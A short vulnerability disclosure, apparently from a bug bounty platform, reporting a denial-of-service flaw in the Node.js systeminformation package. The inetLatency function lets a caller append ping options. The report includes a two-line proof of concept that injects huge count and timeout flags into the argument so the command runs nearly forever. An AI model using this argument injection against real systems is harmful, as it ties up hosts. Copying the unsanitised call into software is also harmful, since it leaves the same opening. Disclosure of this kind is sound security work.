Denial of Service in sebhildebrandt/systeminformation


Reported on

Feb 11th 2021


systeminformation is vulnerable to Denial of Service.

It is possible to overwrite the ping command parameters, which results in too long execution.

Proof of Concept

Create a .js file with the content below and run it.

const si = require('systeminformation');
si.inetLatency("-c 10000000000 -w 999999999").then((a) => { console.log(a) })
to join this conversation